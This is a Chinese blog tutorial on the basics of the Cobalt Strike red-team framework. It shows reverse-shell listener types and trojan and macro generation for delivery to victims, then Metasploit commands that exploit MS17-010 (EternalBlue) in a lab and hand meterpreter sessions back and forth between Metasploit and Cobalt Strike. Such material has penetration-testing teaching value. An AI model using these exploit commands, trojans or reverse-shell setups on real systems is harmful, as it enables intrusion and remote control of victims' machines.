CobaltStrike基础使用

已于 2022-06-15 23:13:13 修改
阅读量1.1w 收藏 5
点赞数 3
分类专栏: Web安全 文章标签: CS cobaltstrike 网络安全 工具
于 2021-12-26 22:31:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49150931/article/details/122161942
版权

Cobalt Strike

简介

Cobalt Strike 分为客户端组件和服务器组件,服务器的组件也是团队服务器,可以放在 局域网或者公网下进行团队使用,也是 Cobalt Strike 社会工程功能的托管机器,团队服务器 还可以存储由 Cobalt Strike 收集的数据,并且进行日志管理 Cobalt Strike 服务器必须在 Linux 系统上运行,这里演示服务器在 Linux KALI 端,本地进行 Cobalt Strike 客户端的连接。
在这里插入图片描述CobaltStrike 集成了端口转发、服务扫描,自动化溢出,多模式端口监听,windows exe 木 马生成,windows dll 木马生成,java 木马生成,office 宏病毒生成,木马捆绑。钓鱼攻击 包。

CS的使用

启动 CS 服务端
在这里插入图片描述在这里插入图片描述启动客户端 服务端启动后客户端启动进行连接(团队多人连接将用户名设置为自己的用来区分团队成员)
在这里插入图片描述主界面
在这里插入图片描述

功能使用(主机上线)

1.设置监听器用来接收会话
在这里插入图片描述name:监听器名字
payload:payload 类型
Host: shell 反弹的主机,
kali IP Port: 反弹端口
在这里插入图片描述

这里 Payload 有 9 种选项,如下
内部的 Listener 
windows/beacon_dns/reverse_dns_txt 
windows/beacon_dns/reverse_http 
windows/beacon_http/reverse_http
windows/beacon_https/reverse_https windows/beacon_smb/bind_pipe 

外部的 Listener 
windows/foreign/reverse_dns_txt
windows/foreign/reverse_http 
windows/foreign/reverse_https 
windows/foreign/reverse_tcp

Beacon 为内置的监听器,在目标主机执行相应的 payload,获取 shell 到 cs 上;其中包含 DNS、 HTTP、HTTPS 等,Beacon 可以选择通过 DNS 还是 HTTP/S 协议出口网络,甚至可以在使用 Beacon 通讯过程中切换 HTTP 和 DNS。其支持多主机连接,部署好 Beacon 后提交一个要连 回的域名或主机的列表,Beacon 将通过这些主机轮询。目标网络的防护团队必须拦截所有 的列表中的主机才可中断和其网络的通讯。通过种种方式获取 shell 以后(比如直接运行生 成的 exe),就可以使用 Beacon 了。

Foreign 为外部结合的 Listener,经常用于 MSF 的结合,例如获取meterpreter 到 MSF 上

2.生成木马

HTML Application 生成恶意的 HTA 木马文件; 
MS Office Macro 生成 office 宏病毒文件; 
Payload Generator 生成各种语言版本的 payload; 
Windows Executable 生成可执行 exe 木马; 
Windows Executable(S) 生成无状态的可执行 exe 木马

在这里插入图片描述在这里插入图片描述这是生成 exe 文件,还可以生成宏病毒等上面介绍到的
生成后会保存到指定地方,通过某种方式上传到对方机器上,可以通过 Webshell 方式等这 里不在讲解了 受害者运行 exe 文件我们的 CS 就直接上线了
在这里插入图片描述
发送给用户,用户双击我们的cs上就成功上线了主机
在这里插入图片描述3.正常我们进去需要调整响应的时间,sleep 3 就行。
在这里插入图片描述
可以对我们上线的机器进行以下操作,也可以联动 MSF 进行使用

联动 MSF 使用

将 MSF 的会话转发到 CS 上
通过漏洞复现演示 MSF 获取目标 Session
KALI:192.168.50.218
CS:192.168.50.130
受害者 IP:192.168.50.185

1.发现漏洞

  • Nmap -A 扫描目标开放了 445 端口

在这里插入图片描述

通过使用 MSF 辅助模块扫描发现存在 ms17_010 漏洞 
use auxiliary/scanner/smb/smb_ms17_010 
set rhosts 192.168.50.185 
exploit

在这里插入图片描述2. 查找漏洞利用模块
在这里插入图片描述

漏洞利用 
use exploit/windows/smb/ms17_010_eternalblue 
set payload windows/x64/meterpreter/reverse_tcp 
set RHOST 192.168.50.185 
Run

在这里插入图片描述获取后 我们 background 获取 session
在这里插入图片描述
与 CS 联动,将会话转发到 CS 中
CS 配置新建一个监听
在这里插入图片描述

KALI 中配置 
use exploit/windows/local/payload_inject 
set payload windows/meterpreter/reverse_http 
set DisablePayloadHandler true 
set lhost 192.168.50.218 //KALI IP 
set lport 4443 与 CS 同端口 
set session 1

在这里插入图片描述CS 这边就接收到了 MSF 的会话
在这里插入图片描述

CS 的会话转发到 MSF 中

由于生成的木马就是 HTTP 的,所以委派给 msf 时,监听器还是 HTTP 的 CS 添加一个监听器
在这里插入图片描述

MSF 准备 
Use exploit/multi/handler 
Set payload windows/meterpreter/reverse_http 
Set lhost ip 
Set lport ip

在这里插入图片描述设置完成后我们就可以使用 CS 进行委派会话了
在这里插入图片描述选中我们刚刚创建的就行
在这里插入图片描述这样我们的 MSF 端就会获取到这个会话 CS 还有非常多的功能,大家慢慢发现!

请添加图片描述

Gaowu-
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CobaltStrike 部署
我的LOG
02-05 1786
CobaltStrike 部署CobaltStrike 文件团队服务器Cobalt Strike Client 基于java的渗透测试神器,非常适合团队协同作战,多个人可以同时连接到一个团队服务器上,共享目标资源与目标信息和sessions,可模拟APT做模拟对抗,进行内网渗透。 CobaltStrike 文件 团队服务器 团队服务器最好运行在Linux平台上,服务端的关键文件是teamserver和cobaltstrike.jar. 安装Java 1.8 默认的JDK 版本太低 不能执行 Except
Cobalt Strike使用教程——基础
热门推荐
Captain_RB的博客
06-10 1万+
本文主要介绍 **Cobalt Strike** 4.3 的基本功能及使用方法
2024年网络安全最新Cobalt Strike汉化版——安装与使用教程_kali安装cobaltstrike4,网络安全开发真等于废人
最新发布
2401_84302628的博客
05-12 1317
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
Cobalt Strike基本使用
m0_60571990的博客
11-06 1788
Cobalt Strike基本使用
CobaltStrike使用-第一篇(基本使用方法、监听器、重定向器,以及通过重定向器隐藏C2服务器)
Love&Share
11-29 5040
文章目录基本使用客户端与服务器连接上线CS基本步骤基础设施监听器BeaconDNS BeaconDNS请求原理实验避坑重定器实验 Cobalt Strike是一款综合的渗透测试神器 官网:https://www.cobaltstrike.com/ 工具的社区版是Armitage(一个MSF的图形化界面工具),CobaltStrike为收费商业版本 手册:CobaltStrike4.0用户手册_中文翻译、4.3、狼组版 Cobalt Strike使用C/S架构,Cobalt Strike的客户端连接到团.
Cobalt Strike的安装
浅笑996的博客
11-12 1万+
一.下载 压缩包下载回来之后,可以看到里面的文件有这些:   其中搭建团队服务器端的关键文件有两个,一个是cobaltstrike.jar,另一个是teamserver,这里我打算将团队服务器端搭在我的vps上。将这两个文件上传到我的vps中,注意这两个都需要,只传一个会报错,而且也不需要其他文件,其中需要对teamserver这个文件进行赋权操作。   之后启动teamserver就可以了,...
cobalt strike 4.7
06-07
2. **Team Server 更新**:Cobalt Strike的Team Server是C2基础设施的中心,处理Beacon连接、数据存储和命令转发。新版本可能包含了更好的负载均衡和高可用性选项,以及更强的数据加密算法,确保通信安全。 3. **...
CobaltStrike4.0渗透测试手册
03-18
Cobalt Strike 4.0版本在前几代的基础上进行了多方面的改进,提升了渗透测试的效率和隐蔽性。手册中可能涵盖了以下核心知识点: 1. **Cobalt Strike简介**:介绍Cobalt Strike的基本概念、功能和用途,包括它的组件...
cobaltstrike-linux.zip
07-09
标题 "cobaltstrike-linux.zip" 暗示了这是一个针对Linux系统的Cobalt Strike工具包。Cobalt Strike是一款广泛使用的网络安全评估工具,主要用于红队操作、渗透测试和模拟攻击,帮助安全专业人员评估组织的安全防护...
SecondaryDevCobaltStrike:二次开发过后的CobaltStrike,版本为4.1.在原来CobaltStrike基础上修改多处特征,解决流量查杀问题
04-16
如有后门,我必完蛋:star:关于二次开发后的CobaltStrike默认的CobaltStrike内存在多处流量特征,在马儿与服务端建立连接时进行流量交互.此间存在多处可疑特征已被各大杀软记录在册如:卡巴斯基,诺顿,迈克菲等,但国内杀...
cobaltstrike
01-26
- **cobaltstrike.jar**:这是一个Java Archive文件,可能包含了Cobalt Strike的部分核心组件或库,利用Java平台的跨平台特性。 - **update.jar**:类似地,这个.JAR文件可能是更新过程的一部分,用于下载和安装...
Cobalt Strike 服务器搭建及使用
diansuimo2268的博客
03-10 4144
Cobalt Strike使用中的一些坑(一) http://www.cnblogs.com/miaodaren/articles/7829793.html cobaltstrike3.8服务器搭建及使用 https://www.cnblogs.com/ssooking/p/6017333.html 转载于:https://www.cnblogs.com/7bit/p/10...
Cobalt Strike 从入门到入狱(一)
swordheart的博客
05-11 1734
1.Cobalt Strike 介绍与安装 Cobalt Strike是一款美国Red Team开发的渗透测试神器,常被业界人称为CS;其拥有多种协议主机上线方式,集成了提权,凭据导出,端口转发,socket代理,office攻击,文件捆绑,钓鱼等功能。同时,Cobalt Strike还可以调用Mimikatz等其他知名工具,因此广受黑客喜爱。 早期版本CobaltSrtike依赖Metasploit框架,而现在Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端(Cli
永恒之蓝ms17-010复现并转移会话到CobaltStrike
x0916的博客
06-08 889
ms17-010漏洞及CobaltStrike会话的转移
Cobalt Strike入门教程-通过exe木马实现远控
weixin_30770495的博客
05-18 5056
Cobalt Strike(简称CS)有很多功能,这篇文章主要介绍最基本的功能:通过exe木马实现远程控制。 CS分为两部分:客户端和Team Server服务端。这两部分都依赖Java 1.8,所以运行CS程序前要安装JRE。 分享一个Cobalt Strike v3.8的试用版,可长期试用。百度网盘:https://pan.baidu.com/s/1nXq58froWt0mu3q8I4Hs...
第六章-2 CS创建监听与payload
划水的小白白
11-16 2592
文章目录一、概念二、创建监听1.启动CS2.创建监听三.创建payload1.部分功能说明:2.生成一个win下的可执行文件木马(exe):3.模拟受害者运行木马4.在CS上查看成果5.其他功能介绍 一、概念 Payload,利用代码,即病毒或者木马,在目标执行后会将shell进行返回。 监听,即监听器,时刻监视payload的执行结果,以及捕捉返回的shell。 二、创建监听 1.启动CS , 2.创建监听 , , , , , 到这基本上就创建成功监听,接下来创建payload。 三.创
设置监听器的几种方式
dyf4281的专栏
11-25 1678
因为前面一个项目,纠结于获取屏幕坐标纠结了好久,突然发觉竟然是因为然发觉竟然是因为如果在Activity的OnCreate()事件输出那些参数,是全为0,要等UI控件都加载完了才能获取到数字。 下面引用下别人博客里面获取绝对坐标(当前窗口,整个屏幕)的方式: getLocationOnScreen 计算该视图在全局坐标系中的x,y值,(注意这个值是要从屏幕顶端算起,也就是包括了通知栏的高度
CobaltStrike基础教程(一)
Azjj
08-10 1984
0x00 简介 1. 什么是CobaltStrike? CobatStrike是一款基于java编写的全平台多方协同后渗透攻击框架。CobaltStrike集成了端口转发、端口扫描、socket代理、提权、钓鱼、远控木马等功能。该工具几乎覆盖了APT攻击链中所需要用到的各个技术环节。在渗透人员实战过程中可以提供一些非常便捷的功能,也可以自己编写脚本实现自动化操作。 2. CobaltStrike的文件结构 │ Scripts 用户安装的插件 │ agscript 拓展应用的脚本 │
团队协同作战渗透工具 CS神器Cobalt Strike
有勇气的牛排博客
02-14 1万+
Cobalt Strike是一款渗透测试工具,常被称为CS神器,从3.0开始不在使用Metaspoit的漏洞库,称为一个独立平台,它分为 客户端(可以是多个)和 服务端(一个)

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值